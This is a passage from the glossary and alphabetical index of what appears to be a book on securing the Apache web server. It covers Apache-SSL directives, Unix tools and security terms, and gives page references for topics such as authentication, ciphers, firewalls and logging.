cache server. See the server documentation for more information. See Chapter 15, 
“Apache/SSL.” 


SSLCacheServerRunDir Use the SSLCacheServerRunDir directive to specify the 
directory in which your cache server runs. See the server documentation for more 
information. See Chapter 15, “Apache/SSL.” 


SSLCertificateFile Use the SSLCertificateFile directive to specify the location 
of your single certificate file (*.pem). See Chapter 15, “Apache/SSL.” 


SSLCertificateKeyFile Use the SSLCertificateKeyFile directive to specify the 
location of your private key file. See Chapter 15, “Apache/SSL.” 


SSLDisable Use the SSLDisable directive to turn off SSL. This is useful when you 
have multiple virtual hosts, and some need SSL and others don’t. See Chapter 15, 
“Apache/SSL.” 


SSLEnable Use the SSLEnable directive to turn on SSL. This is useful when you 
have multiple virtual hosts, and some need SSL and others don’t. See Chapter 15, 
“Apache/SSL.” 
SSLRequireCipher Use the SSLRequireCipher directive to specify a cipher or 
ciphers that a client must conform to in order to transact. This is the reverse of 
SSLBanCipher. For arguments, it takes a comma-delimited list of ciphers that the 
server will accept. See Chapter 15, “Apache/SSL.” 


SSLVerifyClient Use the SSLVerifyClient directive to set your server’s paranoia 
level. Levels run from 0 (no certificate at all required) to 3 (the client must present at 
the least a valid certificate). See Chapter 15, “Apache/SSL.” 


standard error (STDERR) Error output from programs. STDERR typically prints 
directly to your terminal screen in real-time. However, you can redirect this output 
elsewhere if you wish. 


standard input (STDIN) Your commands are standard input. Your operating 
system reads commands (which you express in text) from your terminal and/or 
keyboard. 


standard output (STDOUT) Output from computer programs. STDOUT usually 
prints to your terminal in real-time, but you can redirect this elsewhere if you wish. 


sudo A Unix program that enables system administrators to assign users the power 
to execute select commands as the superuser. 


sysklogd A system logging server in Unix that logs system and kernel messages. 


Tcl A scripting language that, when used in conjunction with tk, can be used to 
create complex graphical applications. 


tcpd Logs (and can allow or deny) telnet, finger, ftp and other connections on 
Unix platforms. 


tcpdchk Verifies that your tcp_wrapper configurations and allow/deny access rules 
are correct. 


tcpdump A network-monitoring tool. 


Telnet authentication option Protocol options for Telnet that add basic 
security to Telnet-based connections, based on rules at the source routing level. See 
RFC 1409 for details: ftp://ftp.isi.edu/in-notes/rfc1409.txt. 


TEMPEST Transient Electromagnetic Pulse Surveillance Technology, the practice 
and study of capturing/eavesdropping on electromagnetic signals that emanate from 
electronic devices. TEMPEST shielding is where a computer system is armored to 
prevent emissions, and is thus designed to defeat such eavesdropping. 


traffic analysis Traffic analysis is the study of patterns in communication, rather 
than the communication’s actual content. For example, studying when, where, and 
to whom particular messages are being sent, instead of studying the content of those 
messages. 
TripWire An add-on file integrity checker. 


trojan horse A code or application that, unbeknownst to the user, performs 
surreptitious and unauthorized tasks that can compromise system security. 


trusted system A secure operating system for use in environments where classi- 
fied information is warehoused. 


UID UserID. 


UPS (Uninterruptible Power Supply) A backup power supply for when your 
primary power source fails. 


user ID Generally, any value by which a user is identified, including their user 
name. Specifically in relation to multi-user environments, any process ID—typically 
a numeric value—that identifies a process’s owner. 


util.c Apache server source file containing functions that handle strings (and one 
that declares that Rob owed Roy a beer. I wonder if he ever squared up?) Includes 
apr.h, apr_strings.h, apr_lib.h, apr_want.h, unistd.h, netdb.h, ap_config.h, 
apr_base64.h, httpd.h, http_main.h, http_log.h, http_protocol.h, http_config.h, 
util_ebcdic.h, pwd.h, grp.h, and test_char.h. 


util_charset.c Apache server source file referencing functions that handle 
charset conversion (ISO-8859-1, ASCII, HDRS). Includes ap_config.h, httpd.h, 
http_log.h, http_core.h, and util_charset.h. 


util_debug.c Apache server source file containing functions to allow for and 
handle module-specific data handling. Includes apr_want.h, httpd.h, and 
http_config.h. 


util_ebcdic.c Apache server source file containing functions that handle charset 
conversion (ISO-8859-1, ASCII, HDRS). Includes ap_config.h, apr_strings.h, 
httpd.h, http_log.h, http_core.h, and util_ebcdic.h. 


util_filter.c Apache server source file containing functions that handle bucket- 
to-filter management. Includes apr_want.h, apr_lib.h, apr_hash.h, apr_strings.h, 
httpd.h, http_log.h, util_filter.h, and apr_hooks.h. 


util_md5.c Apache server source file containing a module interface to the digest 
algorithm MD5. Includes ap_config.h, apr_portable.h, apr_strings.h, httpd.h, 
util_md5.h, and util_ebcdic.h. 


util_script.c Apache server source file containing functions that handle script 
identification and validation (and also prevent malicious scripts from capturing 
passwords). Includes apr.h, apr_lib.h, apr_strings.h, apr_want.h, 
stdlib.h, ap_config.h, httpd.h, http_config.h, http_main.h, http_log.h, 
http_core.h, http_protocol.h, http_request.h, util_script.h, apr_date.h, 
util_ebcdic.h, and os2.h. 
util_time.c Apache server source file that implements a cache for the exploded 
values of recent timestamps. Includes util_time.h. 


util_xml.c Apache server source file containing functions to handle XML requests. 
Includes apr_xml.h, httpd.h, http_protocol.h, http_log.h, http_core.h, and 
util_xml.h. 


vhost.c Apache server source file containing functions to handle virtual host 
address configuration and runtime issues. Includes apr.h, apr_strings.h, apr_lib.h, 
apr_want.h, ap_config.h, httpd.h, http_config.h, http_log.h, http_vhost.h, 
http_protocol.h, http_core.h, and arpa/inet.h. 


Virtual Private Network (VPN) A closed, private network and secure circuit 
over intranet or Internet lines where transitory data is encrypted and passed only 
between trusted points. 


vulnerability (hole) A system weakness (in either hardware or software) that 
allows intruders to gain unauthorized access or deny service. 


write access When a user, group, or public users have write access, it means that 
they have permission and privileges to write to a particular file or directory. 


Index 


Symbols 


3-Way block cipher, 422 
3Com OfficeConnect firewall, 410 
80/20 rule, 73-74 


A 


ab tool (Apache HTTP Server Benchmarking), 
161-162 


arguments, 163 
options, 163 
absolute paths, 271-273 
testing, 210 

time-based, 217-218 

tools, 383 

virtual hosts, 222 
access log (HTTP), 175-176 
access.conf file, 211-212 
AccessFileName directive 

htpasswd tool, 475 
accessibility, media, 62-63 
accounts 

Oracle, 97 

shell (Unix), 78 
ACL (Access Control Lists), 141 
AddHandler directive, 584 
adding permissions (Unix), 138 
addresses, IPv6, 125-126, 129 
administration, 135 

example security issues, 505-553 
administrator e-mail, specifying, 500 
Advanced TCP/IP settings dialog box, 398 
Alias directive, 144 
AliasMatch directive, 144 
AllowCONNECT directive (mod_proxy), 378 
AllowOverride directive, 476 
amd service, 49 
Analog (logging tools), 200 
analyzing packets, 371 
Anonymous_Authoritative directive, 477 
Anonymous directive, 476 
Anonymous_LogEmail directive, 477 
Anonymous_MustGiveEmail directive, 478 
Anonymous_NoUserID directive, 478 
anonymous users, 23 


security, 490 


Anonymous_VerifyEmail directive, 478 
anti-theft devices, 66 

laptops, 66 
AOL Instant Messenger, risks, 49 
Ap_log_error function, 170 
Ap_log_perror function, 170 
Ap_log_rerror function, 171 
Apache 

API 

constants, 588-595 
quick reference, 575, 581-594 

history, 109-110 

proxy tools, 409 

vulnerability, 44-45 
Apache C source files, 312, 314 

associations, 314-334 
Apache-DBILogConfig (logging tools), 195 
Apache-DBILogger (logging tools), 195 
Apache-DebugInfo (logging tools), 195 
Apache-LogFile (logging tools), 196 
Apache-ParseLog (logging tools), 196 
Apache-SSL, 349-350 

directives, 366-367 

environment variables, 365 

fine-tuning, 365 

installing, 349-350 
Apache-Wombat (logging tools), 196 
apachectl tool, 161 

options, 164 
API (Application Programming Interface), 27 
APLOG_ALERT log constant, 172 
APLOG_CRIT log constant, 172 
APLOG_DEBUG log constant, 172 
APLOG_EMERG log constant, 172 


APLOG_ERR log constant, 172 
APLOG_INFO log constant, 172 
APLOG_LEVELMASK log constant, 172 
APLOG_NOTICE log constant, 172 
APLOG_WARNING log constant, 172 
APLOG_WIN32ERROR log constant, 172 
application gateways (firewalls), 373 

Firewall Tool Kit (FWTK), 373 

Trusted Information Systems (TIS), 373 
Application Programming Interface. See API 
application-level, 20 
application-proxy firewalls, 373 
applications 

resource allocation, 586-588 

Web Server risks, 49 

writing, 586, 588 
apxs tool, 161, 164 

options, 165-166 
arguments, ab tool, 163 
Ashley Laurent BroadWay firewall, 410 
ASP, 255 
assessing risks, 33 
assigning permissions (Unix), 138 
associations, Apache C source files, 314-334 
attack signatures, 372 
attributes, xinetd, 393-396 
auth_ip tool (authentication), 250 
auth_ldap tool (authentication), 250 


auth_oracle module tool (authentication), 
250 


AuthAuthoritative directives, 479 
AuthDBMAuthoritative directive, 480 
AuthDBMUserFile directive, 480 
AuthDBUserFile directive, 481 
authentication, 225, 579 


auth_ldap tool, 250 
auth_oracle_module tool, 250 
cryptographic, 248-249 
DBM-file, 239-247 
digest-based, 225 
digital certificates, 225 
directories, 233-235 
fingerprints, 248-249 
groups, 237-238 
holes, 253 
htdigest system, 492 
HTTP, 238-239 
Inst_auth_module tool, 250 
IPSEC, 122-125 
IPv6, 120 
Kerberos Authentication tool, 250 
LDAP directory, 493-494 
MD5, 249-250 
MD5 cookie, 250 
message digest, 248-249 
mod_auth, 226-232 
mod_auth external tool, 250 
mod_auth_mysql tool, 251 
mod_auth_nds tool, 251 
mod_auth_notes tool, 251 
modules, 579 
passwords, 225 

files, 310 
possible problems, 253 
SSL, 250 
tools, 250-251 
usernames, 225 
users, 226-227, 229-230, 232 
AuthGroupFile directive, 481 
AuthLDAPAuthoritative directive, 481 
AuthName directive, 482 
authoring code, 256-257 
authorization, DBM files, 491 
authorizing 

hosts, 212-213 

information, 481 
AuthType directive, 482 
AuthUserFile directive, 482 
avoiding 

buffer overflows, 263 

buffer overruns, 267-270 

gets(), 268 

metacharacters, 258 

open(), 265 

path risks, 294 

popen(), 260 

relative paths, 271-273 

specific functions, 257 


awk language, 255 


B 


bandwidth 
controlling clients, 157-161 
restricting, 157-161 
bash environment variables, 261-264 
BASIC language, 255 
Berkeley DB-2 files, 239-244, 246 
biometric identification, 63 
FICS, 64-65 
retina, 64-65 


Web resources, 65 


BIOS 
entry keys, 60-61 
passwords, 60 
cracking, 62 
blanket logging, 181 
block ciphers, 422 
3-Way, 422 
Blowfish, 422 
CAST, 422 
DEAL, 423 
DES, 423, 426 
FEAL, 423 
GOST, 423 
IDEA, 423 
LOKI91, 423 
Lucifer, 423 
RC2, 423, 426 
resources, 424 
SAFER, 424 
SQUARE, 424 
TEA, 424 
blocking 
access (time-based), 217-218 
connections, 214 
content, 371 
hosts, 214 
protocol, 371 
Blowfish block cipher, 422 
boot security, 62-63 
disabling, 62 
boot sequences, 62-63 
bootparamd service, 49 
boundary checking, buffers, 267-270 


breaches 
defacement, 45-46 
DoS, 44 
examples, 37 
Microsoft example, 38 
permissions, 135 
scenarios, 41-43 
Secure Root example, 35 
statistics, 34-40 
TASC example, 35 
buffers 
defining, 499 
overflows, 263 
overruns, 267-270 
building 


extension modules, 164 


C 


C (random numbers), 343 


C source files. See Apache C source files, 
314-334 


CAST block cipher, 422 
causing buffer overruns, 267-270 
certificate authorities, 367 
certificates 
digital, 225 
generating, 355-359 
CGI (Common Gateway Interface), 24, 494 
directories, 271-273 
files, 271-273 
Last Lines, weakness, 76 
passing environment variables, 495 
paths, 271-273 
resources, 288 

scripts, running as users, 166 

security risks, 257 

support, 255, 496 
changing permissions 

Unix, 138 
Windows, 141-142 

chdir(), 273 
Check Point SecureServer firewall, 410 
child processes 

constants, 189 

limiting CPU resources, 160 

serialization, 158 
chmod (Unix permissions), 138 
Chrysalis-ITS Luna firewall, 411 
CIFS (Common Internet File System), 56 
ciphers, 419, 421 

Apache-supported, 428 

block, 422 

DES, 425 

ROT-13, 420 

substitution, 420 
Cisco 7200 firewall, 411 
clean up, 587 
client certificates (SSL), 250 
client-server model, MySQL, 90 
client-side languages, limited security, 295 
client-side programming, 291 

exposed source code, 292-294 

JavaScript, 291 

Jscript, 291 

risks, 294 

security issues, 295 

VBScript, 291, 301 
line size, 160 

restricting request body size, 159 
COBOLScript, 255 
Cocentrix XO firewall, 411 
code, intruder risk, 33 
coding proprietary databases, 88-89 
ColdFusion, 255 
command interpreters. See shells 
command tables, 434-435 
commands 

executing within C, 258-259, 261 

NETBIOS, 52 

open(), 264-265 
commerce, Web-based, 338 
commercial databases, 96 
commercial firewalls, 409-416 

vendors, 417-418 
commercial SSL packages, 368-369 
common risks, 116 
communicating (Web-based), 338 
comparing 

commercial firewalls, 413 

IP filtering with firewalls, 397-401 
compiling (OpenSSL), 350-353 
Computer Crime and Security Survey, 34 
Computer Security Institute (CSI), 34-40 
conditional logging, 191, 193 
conditional processing, 285-286 
confidentiality (IPv6), 120 
configuration (access control), 218-219 
configuring xinetd, 392 
CONNECT method (<Limit> directive), 471 
connections, blocking, 214 


console passwords, 60 


constants 

list, 588-595 

logs, 171-172 

piped logs, 189 
content blocking, 371 
content handlers, 434-435 
controlling 

bandwidth, 157-161 

resources, 157-161 
conventions, naming, 292-293 
CookieExpires directive, 483 
CookieLog directives, 483 
cookies 

setting expire time, 483 

tracking, 483 
CookieTracking directives, 483 
COPY methods (<Limit> directive), 471 
correcting URL spelling, 157 
CPU resources, limiting, 160 
crackers, finger directive, 47 
cracking BIOS passwords, 62 
creating 

modules, 436 

network topology, 59 
credit card data, 337 


cross-site scripting (third-party servers), 
296-297 


examples, 296-297 
cryptographic authentication, 248-249 
cryptography, 419 

random numbers, 338-342 

SSL, 344-346 
customizing 

httpd logs, 184-185 

syslog, 180-183 


CustomLog directive, 484 
Cylink NetHawk firewall, 412 


D 


Data Encryption Standard. See DES 
Data Fellows F-Secure firewall, 412 
database management system. See DBMS 
databases 

commercial, 96 

general security, 104 

htdigest, 249-250 

htpasswd, 234 

Informix, 102-104 

MySQL, 89, 92-94 

Oracle, 96-97 

performance, 90-92 

PostgreSQL, 95-96 

proprietary, 88-89 

servers, 104 

support, 87 

Web interaction, 256 
DBM-file, 239-246 

authorization, 247, 491 

dbmmanage, 246-247 
dbmmanage 

DBM files, 246-247 

options, 246-247 
DBMS (database management system), 88-89 
DEAL block cipher, 423 
defacement, 45-46 
default handlers, 585 
defining network buffer size, 499 
DELETE method (Limit directives), 471 
demanding authentication, 225 
denial-of-service (DoS), 44 
denial-of-service attacks, 24 
denying 
hosts, 214-215 
user access, 203 
DES (Data Encryption Standard), 425 
authentication, 337 
input blocks, 426 
padding, 426 
permutations, 426 
DES block cipher, 423 
developing 
command tables, 434-435 
content handlers, 434-435 
modules, 431-432, 436 
examples, 455-461 
functions, 436 
mod_auth_ip, 455-461 
mod_fortress example, 436-453 
mod_random, 462-464 
resources, 466-467 
dhcpd service, 49 
digest-based authentication, 225 
digital certificates, 225 
Digital Signature Standard. See DSS 
directives 
AllowOverride, 476 
Anonymous, 476 
Anonymous_Authoritative, 477 
Anonymous_LogEmail, 477 
Anonymous_MustGiveEmail, 478 
Anonymous_NoUserID, 478 
Anonymous_VerifyEmail, 478 
Apache-SSL, 366-367 
AuthAuthoritative, 479 
AuthDBMAuthoritative, 480 
AuthDBMUserFile, 480 
AuthDBUserFile, 481 
AuthGroupFile, 481 
AuthLDAPAuthoritative, 481 
AuthName, 482 
AuthType, 482 
AuthUserFile, 482 
CookieExpires, 483 
CookieLog, 483 
CookieTracking, 483 
CustomLog, 484 

full list, 597-621 
IdentityCheck, 484 
<Limit>, 471-472 
<LimitExcept>, 473 
LimitRequestBody, 485 
LimitRequestFields, 485 
LimitRequestFieldsize, 486 
LimitRequestLine, 486 
LimitXMLRequestBody, 486 
LockFile, 487 

LogFormat, 487-488 
mod_access, 488 
mod_auth, 489 
mod_auth_anon, 490 
mod_auth_db, 491 
mod_auth_dbm, 491 
mod_auth_digest, 492 
mod_auth_ldap, 493-494 
mod_cgid, 494 


mod_proxy, 377 
mod_suexec, 496 
mod_unique_id, 497 
mod_user_track, 497 
mod_userdir, 155-156 
PassEnv, 497 

PHP safe mode, 279 
PidFile, 498 
ProxyBlock, 498 
ProxyDomain, 498 
ProxyReceiveBufferSize, 499 
ProxyRemote, 499 
ProxyRequests, 499 
ProxyVia, 499 
RewriteCond, 151 
security, 471 
ServerAdmin, 500 
ServerAlias, 500 
ServerName, 501 
ServerPath, 501 
ServerRoot, 501 
ServerSignature, 502 
SSL, 347-348 

User, 502 

UserDir, 503 
<VirtualHost>, 474 


directories 


access control, 24 

CGI, 271-273 

indexing, 221 

mapping, 155-156 

password protecting (htpasswd), 233-235 


mod_env, 495 
mod_include, 495 
mod_log_config, 496 
directory mapping, 143-146 
disable functions (PHP), 279-281 


disabling 

boot options, 62 

functions, 279-281 
domain names, access control, 207 
DoS (denial-of-service), 44 

attacks, 44 

examples, 44-45 

Windows vulnerabilities, 83-85 
DSS (Digital Signature Standard), 338 


dynamic content, modules, 580 


E 


e-commerce, 337 

e-mail 
as passwords, 478 
specifying administrator, 500 
using as password, 477 


embedding external language interpreters, 
465 


employee turnover, 117 
enabling proxy server, 499 
encrypted sessions, 24 
encryption, 42 

DES, 425 

MD5, 427 

SSL, 337-338, 427 
enforcing controls, 203 
entry keys (BIOS), 60-61 
environment, PHP, 275, 278 
environment variables 

access control, 215-217 

Apache-SSL, 365 

bash, 261-264 


examples 


requests, 497 
Unix shells, 76-77 
Windows, 79-85 
error log, 177-183 
LogLevel directive, 184 
setting location, 178 
ErrorLog directive, 177-183 
errors (programming), 255 
escapeshellarg(), 282 
escapeshellcmd(), 282 
establishing 
NOC, 58 
PHP safe mode, 278-279 
proxy servers, 382 
eval 
Perl, 266 
shells, 266 
evaluating access, 204-210 
evidence, logging, 170 


examples 
Apache administrative issues, 505-553 
Apache API constants, 588-595 
Apache security issues, 505-553 
Apache version problems, 111-115 
basic Apache transactions, 575 
cross-site scripting, 296-297 
defacement, 45-46 

DoS (denial-of-service), 44-45 
error logs, 178 

IPv6 implementations, 132-133 
JavaScript third-party attacks, 299 
Melissa worm, 83 

module developing, 436-464 
module development, 455-461 


permissions security breaches, 135 
piped logging, 188 

security breaches, 37-38 

TCP Wrappers, 383-387 

total system seizure, 45-46 

URI handling, 576, 578 

VBScript security issues, 301 
EXCEPT operators, hosts options, 388 
exclusive screening, 213-214 
exec() (Perl), 266 
ExecCGI option, 219 
execute permissions (Unix), 136 
expiration, setting cookie times, 483 
exposed source code, 292-294 
extensibility, 26 

positives, 27 
extension modules 

building, 164 

installing, 164 


external language interpreters, 465 


F 


FEAL block cipher, 423 


FICS (Fingerprint Image Compression 
Standard), 64-65 


fields 
IP Authentication Header Protocol, 122 
limiting clients, 159 
file mapping, 143-146 
file associations (C source files), 314-334 
File Transfer Protocol. See FTP 
files 
access control, 24, 211-212 
Apache C source, 312, 314 


CGI, 271-273 
DBM, 239-240, 242-246 
htaccess, 235-237 
HTTP Access Log, 175-176 
logs, 185-186 
open(), 264-265 
password authentication, 305, 310 
security, 311, 313 
filtering packets, 371 
fine-tuning Apache-SSL, 365 
finger directive, 47 


Fingerprint Image Compression Standard. 
See FICS 


fingerprints, 63, 248-249 
Firewall Tool Kit (FWTK), 373 
firewalls, 371 
Apache Proxies, 374-379 
application gateways, 373 
application-proxy, 373 
blocking 
content, 372 
protocol, 372 
commercial, 409-418 
gateways, 376 
IP filtering, 397-399, 401 
network-level, 372 
packets, 372 
proxy tools, 402, 405 
router-based, 373 
TCP Wrapper comparison, 390 
xinetd, 392 
flags, RewriteRule directive, 155 
Flash, 255 
flaws, Apache authentication, 253 


FollowSymLinks option (access control), 219 


formatting logs, 487-488 
FTP (File Transfer Protocol), 46 
proxy servers, 374-379 
function names, hackers, 292-293 
functions 
avoiding, 257 
committing source, 285-286 
disabling, 279-281 
password handling, 310 


G 


gateways, 376 

GDBM files, 239-246 

generating certificates, 355, 357-359 
generic, 20 

Genuity Advantage firewall, 413 
GET method (Limit directives), 471 
gets(), avoiding, 268 

gopherd service, 50 

GOST block cipher, 423 

granting access, 204-210 

group permissions (Unix), 138 


groups, authentication, 237-238 


H 


hackers, 255 
client-side programming, 292 
exposed source code, 292-294 
function names, 292-293 
hostnames, 292 
paths, 292-294 


user input, 270 
variable names, 292-293 
handlers, 584 
AddHandler directive, 584 
default, 585 
request objects, 586 
handling 
dynamic content (modules), 580 
passwords, 310 
user input, 270 
hardware, records, 67 
HEAD method (Limit directives), 472 
header fields (HTTP), 191-193 
access control, 215-217 
IP Authentication Header Protocol, 122 
help, module developing, 466-467 
history, Apache versions, 109-115 
holes (authentication), 253 
hooks (logging), 174-175 
Horst Feistel, 422 
hostnames, hackers, 292 
hosts 
authorizing, 212-213 
blocking, 214 
denying, 214-215 
DoS attacks, 44 
mutual-failure directive, 214-215 
naming, 213 
R services, 48 
virtual, 222 
hosts options (TCP Wrappers), 388 
EXCEPT operator, 388 
housing servers, 58 
htaccess files, 235-237 
htdigest tool, 249-250 
htgroup files, 237-238 
HTML, PHP code, 273 


htpasswd (Web directory passwords), 
233-235 


databases, 234 
options, 233-235 
syntax, 233-235 
htpasswd tool, 475 
HTTP (proxy servers), 374-379 
authentication, 237-239 
basic security consideration, 20-22 
encryption, 337 
header fields, 191-193 
stateless protocol, 337 
HTTP request methods, limiting, 474 
httpd, status codes, 176-177 
httpd logs, 175 
customizing, 184-185 
HTTPS (proxy servers), 374-379 
httpsd 
startup files, 360 
testing server, 361-362 


IBM AIX VPN firewall, 413 

Icon West Qwest firewall, 414 

IDEA block cipher, 423 

identification systems, 68 

identifying servers, 501 

IdentityCheck directive, 484 
limitations, 484 

Includes option (access control), 220 


inclusive screening, 212-213 


Indexes option (access control), 221 
indexing directories, 221 


Indus River Aurorean Virtual Network firewall, 414 


Informix, 102-104 
vulnerabilities, 102-104 
innd service, 50 
input (users), 270 
input blocks (DES), 426 
inst_auth_module tool (authentication), 250 
installing 
Apache, 354-355 
Apache-SSL, 349-350 
extension modules, 164 
mod_ssl, 346-348 
Oracle, 96 
integrating Apache (operating systems), 71 
internal commands, user input, 258-259, 261 
internal procedures (PHP), 283-284 
International breaches, 37 
Internet 
biometric identification resources, 65 
credit card data, 337 
resources, 555 
Internet Protocol Version 6. See IPv6 
intruders, 33 
access, 41-43 
gaining access, 33 
unauthorized access, 33 
IP, setting securities, 397 
IP Authentication Header Protocol, 121 
cryptographic schemes, 121 
IP Encapsulating Security Payload, 122-125 


IP filtering, firewall capabilities, 397-401 
IPSEC 
authentication, 122-125 
MD5, 401 
MMC IPSEC Policy snap-in, 399-401 
resources and history, 123 
SHA, 402 
tunneling, 122-125 
IPv6 (Internet Protocol Version 6), 119 
addresses, 125 
anycast, 126 
basic structure, 125-126, 129 
multicast, 126 
prefix-type pairs, 127 
reserved, 126 
unicast, 126 
Apache issues, 128 
authentication, 120 
benefits, 119 
confidentiality, 120 
example implementations, 132-133 
IPSEC, 123 
Listen directive, 132 
NameVirtualHost directive, 132 
resources 
reports, 130-131 
Web sites, 130-131 
security, 120 
VirtualHost directive, 132 
ISAPI, 256 
ISPEC, 397-399, 401 


issues, security breach examples, 505-553 
J 


Java, 256 
JavaScript, 291 
methods, 298 
objects, 298 
permissions, 298 
Same Origin Policy, 298 
server-side script, 294 
third-party attacks, 299 
Jscript, 291 
JSP, 256 


K 


Kerberos Authentication tool, 250 


klogd daemons, 179 


L 


languages 
ASP, 255 
awk, 255 
C++, 255 
CGI, 255 
client-side programming, 294 
COBOLScript, 255 
ColdFusion, 255 
Flash, 255 
ISAPI, 256 
Java, 256 
JSP, 256 
Perl, 256 
PHP, 256 

Python, 256 

shell, 256 

support, 255 

TCL, 256 

XML, 256 
laptops, securing, 66 
Last Lines (CGI), 76 

logs, 186 

weakness, 76 
LavaRand (random numbers), 339 
LDAP, 49 


LDAP directory, mod_auth_ldap directive, 
493-494 


liability, third-party servers, 295-297 
Limit directives, 471-472 
LimitExcept directive, 473 
limiting 

child processes CPU resources, 160 

client field size, 486 

client line size, 160 

client request, 485 

client request body, 159 

HTTP request methods, 474 

memory resources, 161 

request fields, 159 

user processes, 161 
LimitRequestBody directive, 159, 485 
LimitRequestFields directive, 159, 485 
LimitRequestFieldsize directive, 486 
LimitRequestFieldssize directive, 160 
LimitRequestLine directive, 160, 486 
LimitXMLRequestBody directive, 486 
line size, limiting, 160 
LINK method (Limit directives), 472 


links, Web resources, 555 
Listen directive, 132 
lists 
bash environment variables, 261-264 
directives, 597-621 
example security issues, 505-553 
testing tools, 286-287 
location 
error logs, 178 
logs, piping, 187, 189-191 
servers, 58 
LOCK method (Limit directive), 472 
LockFile directive, 487 
lockfiles, setting path, 487 
log constants, 171-172 
Log-Dispatch (logging tools), 196 
LogFormat directive, 184-185, 487-488 
logging, 23, 169 
ap_log error function, 170 
ap_log_perror function, 170 
ap_log_rerror function, 171 
blanket, 181 
conditional, 191, 193 
constants (children), 189 
cracker evidence, 170 
customizing, 184-185 
errors, 177-183 
format, 487-488 
hooks, 174-175 
HTTP, 175-176 
httpd logs, 175 
internal holes, 186 
modules, 173-174 
permissions, 185-186 
PID, 169 


routines, 174-175 

SetEnvIf directive, 191-193 

setting format, 484 

syslog, 180-183 

tools, 193, 197 

UID, 169 

users, 169 
logging parameter block, 453 
LogLevel directive (error logs), 184 
logs, 169 

Last Lines, 186 

piped, 187, 189-191 

security, 185-186 
LogSurfer (logging tools), 199 
LOKI91 block cipher, 423 
lpd service, 50 


Lucent Technologies VPN Firewall Brick 1000, 
414 


Lucifer block cipher, 423 


M 


Mac OS, Apache vulnerabilities, 114 
maintaining 

software upgrades, 116 

employee turnover, 117 
managing permissions (Unix), 78 
mapping 

directives, 155-156 

directories, 143-146 

external programs, 150 

files, 143-146 

mod_alias, 143-146 

mod_rewrite, 143-154 
mod_spelling, 143 
mod_userdir, 143 
mod_vhost_alias, 143 
URL, 143-148, 150-157 


MD5 (message digest algorithms), 401, 427, 
482 


MD5 authentication, 249-250 
MD5 Cookie (authentication), 250 
media accessibility, 62-63 
Melissa worm, 83 
memory 

avoiding hackers, 268 

limiting resources, 161 
merging modules, 582 
message digest algorithms, 248-249 

MD5, 482 
message digests, 248-249 
metacharacters (shells), 258 

Unix shells, 76 
methods, 24, 471 

JavaScript, 298 

<Limit> directive, 472 
Microsecure firewall, 416 
Microsoft, breach examples, 38 
Mime-Type modules, 579 
MKCOL method (<Limit> directive), 472 
MMC IPSEC Policy snap-in, 399-401 
mod_access directive, 204-210, 488 
mod_alias (mapping), 144-146 
mod_alias directive (mapping), 143-144 
mod_auth_anon directive, 490 
mod_auth_db directive, 491 
mod_auth_dbm, 239-240, 242-244, 246 
mod_auth_dbm directive, 491 
mod_auth_digest directive, 492 


How can we make this index more useful? Email us at indexes@samspublishing.com 
mod_auth directive, 489 
mod_auth external tool (authentication), 250 
mod_auth_ip, 455-456, 458, 460-461 
mod_auth_ldap directive, 493-494 
mod_auth modules, 226-227, 229-230, 232 
mod_auth_mysql tool (authentication), 251 
mod_auth_nds tool (authentication), 251 
mod_auth_notes tool (authentication), 251 
mod_auth_nt tool (authentication), 251 
mod_auth_ora7 tool (authentication), 251 
mod_auth_ora8 tool (authentication), 251 
mod_auth_oracle/win32 tool (authentication), 251 
mod_auth_radius tool (authentication), 251 
mod_auth_samba tool (authentication), 251 
mod_auth_sys tool (authentication), 251 
mod_auth_tacacs tool (authentication), 251 
mod_auth_tds tool (authentication), 251 
mod_auth_yp tool (authentication), 252 
mod_bakery tool (authentication), 252 
mod_cgi directive, 494 
mod_cgid directive, 494 
mod_env directive, 495 
mod_fortress, 402, 405 
example, 436-453 
directives, 405 
plugging in, 449-453 
mod_include directive, 495 
mod_ip forwarding, 405 
directives, 406 
downloading, 406 
mod_LDAPauth tool, 252 
mod_limitipconn, 406 
installing, 406 
mod_log_config directive, 496 
mod_log_mysql (logging tools), 194 
mod_mylog (logging tools), 194 
mod_ntlm tool (authentication), 252 
mod_proxy 
directives, 377 
establishing, 382 
proxy servers, 376-379 
mod_python, 465 
mod_random, 462-464 
examples, 462-464 
mod_relocate tool (logging tools), 194 
mod_rewrite directive (mapping), 143-154 
mod_rpaf, 407 
mod_secureid tool (authentication), 252 
mod_speling directive, 157 
mapping, 143 
mod_ssl, 343 
core source files, 344-346 
installing, 346-348 
mod_suexec directive, 496 
mod_ticket tool (authentication), 252 
mod_tproxy, 408 
mod_unique_id directive, 497 
mod_user_track directive, 497 
mod_userdir directive, 155-156 
mapping, 143 
UserDir directive, 155-156 
mod_vhost_alias directive, mapping, 143 
mod_view (logging tools), 194 
models, 28 
modular design, 27 
modules, 27 
authentication, 579 
content-handling, 435 
developing, 431-432, 436 
examples, 455-461 
mod_fortress example, 436-453 
mod_random, 462-464 
resources, 466-467 
dynamic content, 580 
functions, 436 
intervening, 432 
logging, 173-174 
merging, 582 
Mime-type, 579 
mod_mysql, 91 
mod_python, 465 
plugging in, 449, 451-453 
PostgreSQL, 95-96 
response header, 580 
URI handling, 578 
user access, 579 

MOVE method (<Limit> directive), 472 
mutual-failure directive, 214-215 
MySQL, 89 
client-server model, 90 
independent developers, 90 
modules, 91 
performance, 90-92 
PHP modules, 91-92 
vulnerabilities, 92-94 


N 


NAI PGP Keyserver (permissions examples), 135 
NameVirtualHost directive, 132 
naming 
functions, 292-293 
hosts, 213 
variables, 292-293 
naming conventions, 292-293 
National Bureau of Standards (DES), 425 
NCB (Network Control Block), 51 
NDBM files, 239-246 
generating, 150 
NETBEUI (NetBIOS Extended User Interface), 53 
NETBIOS, 51 
commands, 52 
Netlog (logging tools), 199 
Netscape, SSL breach, 338 
Netscreen Security Systems Netscreen 1000 firewall, 415 
network components, 59 
network access control, 203 
access.conf, 211-212 
Network Associates Gauntlet 6.0 firewall, 415 
Network Control Block Fields, 52 
Network Control Block. See NCB 
Network File System. See NFS 
network operations center (NOC), 58 
network topology, 59 
electronic eavesdropping, 59 
fault tolerance, 59 
single points of failure, 59 
network-level firewalls, 372 
networks 
access control, 24 
buffer size, 499 
layout, 59 
trust relationships, 117 
NFS (Network File System), 47-48 
remote users, 47-48 
NOC (network operations center), 58 
establishing, 58 
NOCOL/NetConsole v4.0 (logging tools), 199 
NoProxy directive (mod_proxy), 378 


O 


objects (JavaScript), 298 
octal system (Unix permissions), 139 
open source, 305 
open source applications, 25 
Open Source Databases, MySQL, 89 
open(), 264-265 
OpenSSL, compiling, 350-353 
operating systems, 69 
